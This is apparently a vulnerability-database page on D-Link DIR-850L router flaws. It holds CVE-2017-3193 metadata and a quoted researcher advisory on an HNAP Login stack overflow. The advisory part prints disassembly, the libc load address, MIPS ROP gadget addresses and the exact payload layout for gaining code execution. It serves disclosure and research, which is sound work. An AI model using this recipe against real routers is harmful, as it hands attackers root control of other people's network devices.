
25 vulnerabilities found for dir-850l by dlink

VAR-201712-0130

Vulnerability from variot - Updated: 2024-04-20 23:17

Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service. Stack-based buffer overflow (CWE-121) - CVE-2017-3193. A third party who has access to the product can cause a buffer overflow by sending a POST request with crafted HNAP_AUTH and SOAPAction headers to http://[Router IP address]/HNAP1/, making it possible to execute arbitrary code with root privileges. By default, remote management is disabled, so attacks are limited to the LAN-side interface. A third party who has access to the product may execute arbitrary code with root privileges. The D-Link DIR-850L is a wireless router from D-Link. An attacker could exploit the vulnerability to execute arbitrary code in the context of an affected device, causing a denial of service. Multiple D-Link routers are prone to a stack-based buffer-overflow vulnerability. Failed exploit attempts will likely cause a denial-of-service condition. D-Link DIR-850L firmware versions 1.14B07, 2.07.B05 are affected; other versions are also affected


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201712-0130",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "2.07.b05"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.14b07"
      },
      {
        "model": "dir-850l 1.14b07",
        "scope": null,
        "trust": 0.9,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l 2.07.b05",
        "scope": null,
        "trust": 0.9,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "version  1.14b07"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "version  2.07.b05"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "1.14b07"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "2.07.b05"
      },
      {
        "model": "dir-850l 2.07b05 h1ke beta1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l 1.14b07 h2ab beta1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "db": "BID",
        "id": "96747"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3193"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:1.14b07:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:2.07.b05:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-3193"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sergi Martinez for NCC Group.",
    "sources": [
      {
        "db": "BID",
        "id": "96747"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2017-3193",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.5,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Adjacent Network",
            "authentication": "None",
            "author": "IPA",
            "availabilityImpact": "Complete",
            "baseScore": 8.3,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "JVNDB-2017-001662",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-02627",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "ADJACENT_NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 8.3,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 6.5,
            "id": "VHN-111396",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:A/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Adjacent Network",
            "author": "IPA",
            "availabilityImpact": "High",
            "baseScore": 8.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2017-001662",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-3193",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "IPA",
            "id": "JVNDB-2017-001662",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-02627",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201703-416",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-111396",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-111396"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3193"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service. Stack-based buffer overflow (CWE-121) - CVE-2017-3193. A third party who has access to the product can cause a buffer overflow by sending a POST request with crafted HNAP_AUTH and SOAPAction headers to http://[Router IP address]/HNAP1/, making it possible to execute arbitrary code with root privileges. By default, remote management is disabled, so attacks are limited to the LAN-side interface. A third party who has access to the product may execute arbitrary code with root privileges. The D-Link DIR-850L is a wireless router from D-Link. An attacker could exploit the vulnerability to execute arbitrary code in the context of an affected device, causing a denial of service. Multiple D-Link routers are prone to a stack-based buffer-overflow vulnerability. Failed exploit attempts will likely cause a denial-of-service condition. \nD-Link DIR-850L firmware versions 1.14B07, 2.07.B05 are affected; other versions are also affected",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-3193"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "db": "BID",
        "id": "96747"
      },
      {
        "db": "VULHUB",
        "id": "VHN-111396"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-3193",
        "trust": 3.4
      },
      {
        "db": "CERT/CC",
        "id": "VU#305448",
        "trust": 2.8
      },
      {
        "db": "BID",
        "id": "96747",
        "trust": 2.6
      },
      {
        "db": "JVN",
        "id": "JVNVU98628696",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU99822187",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627",
        "trust": 0.6
      },
      {
        "db": "SEEBUG",
        "id": "SSVID-92825",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-111396",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-111396"
      },
      {
        "db": "BID",
        "id": "96747"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3193"
      }
    ]
  },
  "id": "VAR-201712-0130",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-111396"
      }
    ],
    "trust": 0.06999999999999999
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      }
    ]
  },
  "last_update_date": "2024-04-20T23:17:14.088000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "D-Link Technical Support - DIR-850L Downloads",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "DIR-850L Firmware Patch Notes (FW1.14.B07)",
        "trust": 0.8,
        "url": "ftp://ftp2.dlink.com/security_advisements/dir-850l/reva/dir-850l_reva_firmwarepatchnotes_1.14.b07_en.pdf"
      },
      {
        "title": "DIR-850L Firmware Patch Notes (FW2.07.B05)",
        "trust": 0.8,
        "url": "ftp://ftp2.dlink.com/security_advisements/dir-850l/revb/dir-850l_revb_firmwarepatchnotes_2.07b05_en.pdf"
      },
      {
        "title": "Patches for multiple D-Link product stack buffer overflow vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/90393"
      },
      {
        "title": "D-Link DIR-850L Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67829"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-121",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-111396"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3193"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.8,
        "url": "https://www.kb.cert.org/vuls/id/305448"
      },
      {
        "trust": 2.3,
        "url": "http://www.securityfocus.com/bid/96747"
      },
      {
        "trust": 1.7,
        "url": "https://tools.cisco.com/security/center/viewalert.x?alertid=52967"
      },
      {
        "trust": 1.7,
        "url": "https://twitter.com/nccgroupinfosec/status/845269159277723649"
      },
      {
        "trust": 1.7,
        "url": "https://www.nccgroup.trust/uk/our-research/d-link-dir-850l-web-admin-interface-vulnerable-to-stack-based-buffer-overflow/?research=technical+advisories"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3193"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu98628696/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu99822187/"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3193"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-111396"
      },
      {
        "db": "BID",
        "id": "96747"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3193"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "db": "VULHUB",
        "id": "VHN-111396"
      },
      {
        "db": "BID",
        "id": "96747"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-3193"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-03-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "date": "2017-12-16T00:00:00",
        "db": "VULHUB",
        "id": "VHN-111396"
      },
      {
        "date": "2017-03-08T00:00:00",
        "db": "BID",
        "id": "96747"
      },
      {
        "date": "2017-03-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "date": "2017-03-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      },
      {
        "date": "2017-12-16T02:29:10.417000",
        "db": "NVD",
        "id": "CVE-2017-3193"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-03-12T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-02627"
      },
      {
        "date": "2019-10-09T00:00:00",
        "db": "VULHUB",
        "id": "VHN-111396"
      },
      {
        "date": "2017-03-16T02:00:00",
        "db": "BID",
        "id": "96747"
      },
      {
        "date": "2018-03-14T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      },
      {
        "date": "2019-10-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      },
      {
        "date": "2023-11-08T20:19:55.387000",
        "db": "NVD",
        "id": "CVE-2017-3193"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote or local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Buffer overflow vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001662"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201703-416"
      }
    ],
    "trust": 0.6
  }
}

VAR-201807-0057

Vulnerability from variot - Updated: 2024-04-20 23:17

Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L. D-Link Systems, Inc. According to the reporter's report, HNAP communication takes place only on the LAN-side interface. CWE-121: Stack-based Buffer Overflow https://cwe.mitre.org/data/definitions/121.html A third party who can access the product's LAN-side interface may execute arbitrary code with administrator privileges. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. D-Link DIR-823, etc. are all wireless router products of D-Link. tl;dr

A stack bof in several Dlink routers, which can be exploited by an unauthenticated attacker in the LAN. There is no patch as Dlink did not respond to CERT's requests. As usual, a Metasploit module is in the queue (see [9] below) and should hopefully be integrated soon.

The interesting thing about this vulnerability is that it affects both ARM and MIPS devices, so exploitation is slightly different for each type.

Link to CERT's advisory: https://www.kb.cert.org/vuls/id/677427

Link to a copy of the advisory pasted below: https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt

Have fun.

Regards, Pedro

Multiple vulnerabilities in Dlink DIR routers HNAP Login function (multiple routers affected) Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ========================================================================== Disclosure: 07/11/2016 / Last updated: 07/11/2016

Background on the affected products: "Smartphones, laptops, tablets, phones, Smart TVs, game consoles and more – all being connected at the same time. That's why we created the new AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to 3.2Gbps, it delivers the necessary ultra-performance to power even the most demanding connected homes, making it the best wireless home router for gaming."

Summary: Dlink routers expose a protocol called HNAP (Home Network Administration Protocol) on the LAN interface. This is a SOAP protocol that allows identification, configuration, and management of network devices. For more information regarding HNAP, see [1] and [2].

Dlink has a long history of vulnerabilities in HNAP. Craig Heffner in particular seems to have found a lot of them (see [3], [4], [5], [6], [7], [8]). The affected function contains two subsequent stack overflows, which can be exploited by an unauthenticated attacker on the LAN. It affects a number of Dlink routers which span the ARM and MIPS architectures. A Metasploit module that exploits this vulnerability for both architectures has been released [9].

A special thanks to CERT/CC and Trent Novelly for help with disclosing this vulnerability to the vendor. Please refer to CERT's advisory for more details [10]. See below for other constraints. Affected versions: The following MIPS devices have been confirmed to be vulnerable: DIR-823 DIR-822 DIR-818L(W)

The following ARM devices have been confirmed to be vulnerable: DIR-895L DIR-890L DIR-885L DIR-880L DIR-868L -> Rev. B and C only

There might be other affected devices which are not listed above.


Vulnerability details and MIPS exploitation

The vulnerable function, parse_xml_value (my name, not a symbol), is called from hnap_main (a symbol in the binary) in /htdocs/cgibin. This function takes 3 arguments: the first is the request object / string, the second is the XML tag name to be parsed inside the request, and the third is a pointer to where the value of that tag should be returned.

The function tries to find the tag name inside the request object and then extracts the tag value, copying it first to a local variable and then to the third argument. This function is called from hnap_main when performing the HNAP Login action to obtain the values of Action, Username, LoginPassword and Captcha from the SOAP request shown above.

parse_xml_value(char request, char XMLtag, char* tag_value) (...) .text:00412264 xml_tag_value_start = $s2 .text:00412264 xml_tag_value_end = $s1 .text:00412264 C30 addu xml_tag_value_start, $v0, $s0 # s2 now points to $value .text:00412268 C30 la $t9, strstr .text:0041226C C30 move $a1, xml_tag_value_end # needle .text:00412270 C30 jalr $t9 ; strstr .text:00412274 C30 move $a0, xml_tag_value_start # haystack .text:00412278 C30 lw $gp, 0xC30+var_C20($sp) .text:0041227C C30 beqz $v0, loc_4122BC .text:00412280 C30 subu xml_tag_value_end, $v0, xml_tag_value_start # s1 now holds the ptr to value$ .text:00412284 C30 bltz xml_tag_value_end, loc_4122BC .text:00412288 C30 addiu $s0, $sp, 0xC30+xml_tag_var .text:0041228C C30 la $t9, strncpy .text:00412290 C30 move $a2, xml_tag_value_end # n .text:00412294 C30 move $a1, xml_tag_value_start # src .text:00412298 C30 addu xml_tag_value_end, $s0, xml_tag_value_end .text:0041229C C30 jalr $t9 ; strncpy # copies all chars in $value$ to xml_tag_var using strncpy .text:004122A0 C30 move $a0, $s0 # dest .text:004122A4 C30 move $a0, a2_ptr # a2_ptr is a stack variable from hnap_main (passed as third argument to parse_xml_value) .text:004122A8 C30 lw $gp, 0xC30+var_C20($sp) .text:004122AC C30 move $a1, $s0 # src .text:004122B0 C30 la $t9, strcpy # copies xml_tag_var into a2_ptr using strcpy .text:004122B4 C30 jalr $t9 ; strcpy # the stack of the calling function (hnap_main) is thrashed if 2408+ bytes are sent .text:004122B8 C30 sb $zero, 0(xml_tag_value_end) (...)

There are two overflows, therefore two choices for exploitation: 1) The local stack (on parse_xml_value) can be overrun with 3096+ bytes. This overflow occurs even though strncpy is used, because the length argument passed to strncpy is simply the strlen of the value inside the XML tag, which the sender controls, rather than the size of the destination buffer, so it bounds nothing. 2) Alternatively, it's possible to overrun the stack of the calling function (hnap_main), using only 2408+ bytes - this is because strcpy is used to copy the xml_tag_var onto the third argument received by parse_xml_value, which is a pointer to a stack variable in hnap_main.

Exploiting 1) is easier, and the following example will explain how.

All the affected MIPS devices use the same version of uClibc (libuClibc-0.9.30.3.so) and seem to load it at 0x2aabe000, which makes exploitation trivial for all firmware versions. It should be noted that the MIPS devices use the RTL8881a CPU, which is based on a Lexra RLX5281 core. The Lexra RLX cores are MIPS clones, but they're a bit crippled as they lack a few load and store instructions. For this reason, some generic shellcodes that work on MIPS might not work on these CPUs (especially when obfuscated).

The devices also do not have NX, ASLR nor any other modern memory protections, so the shellcode is executed directly on the stack. However, it's necessary to use ROP to prepare the stack for execution, which can be executed with gadgets taken from libuClibc-0.9.30.3.so. Due to the way MIPS CPUs work, it's necessary to flush the CPU cache before executing the exploit. This can be forced by calling sleep() from libc (refer to http://blog.emaze.net/2011/10/exploiting-mips-embedded-devices.html for an explanation on the MIPS CPU caches).

So the ROP chain and shellcode will look like:

first_gadget - execute sleep and call second_gadget .text:0004EA1C move $t9, $s0 <- sleep() .text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget .text:0004EA24 li $a0, 2 <- arg for sleep() .text:0004EA28 lw $s0, 0x20+var_8($sp) .text:0004EA2C li $a1, 1 .text:0004EA30 move $a2, $zero .text:0004EA34 jr $t9 .text:0004EA38 addiu $sp, 0x20

second_gadget - puts stack pointer in a1: .text:0002468C addiu $s1, $sp, 0x58 .text:00024690 li $s0, 0x44 .text:00024694 move $a2, $s0 .text:00024698 move $a1, $s1 .text:0002469C move $t9, $s4 .text:000246A0 jalr $t9 .text:000246A4 move $a0, $s2

third_gadget - call $a1 (which now has the stack pointer): .text:00041F3C move $t9, $a1 .text:00041F40 move $a1, $a2 .text:00041F44 addiu $a0, 8 .text:00041F48 jr $t9 .text:00041F4C nop

When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (3000+ bytes), it's possible to jump back to xml_tag_value[0]. prep_shellcode_1 = 23bdf3c8 # addi sp,sp,-3128 prep_shellcode_2 = 03a0f809 # jalr sp branch_delay = 2084f830 # addi a0,a0,-2000 (NOP executed as a MIPS branch delay slot)

The final Action / Username / LoginPassword / Catpcha XML parameter value will be: shellcode + 'a' * (3072 - shellcode.size) + sleep() + '1' * 4 + '2' * 4 + '3' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay

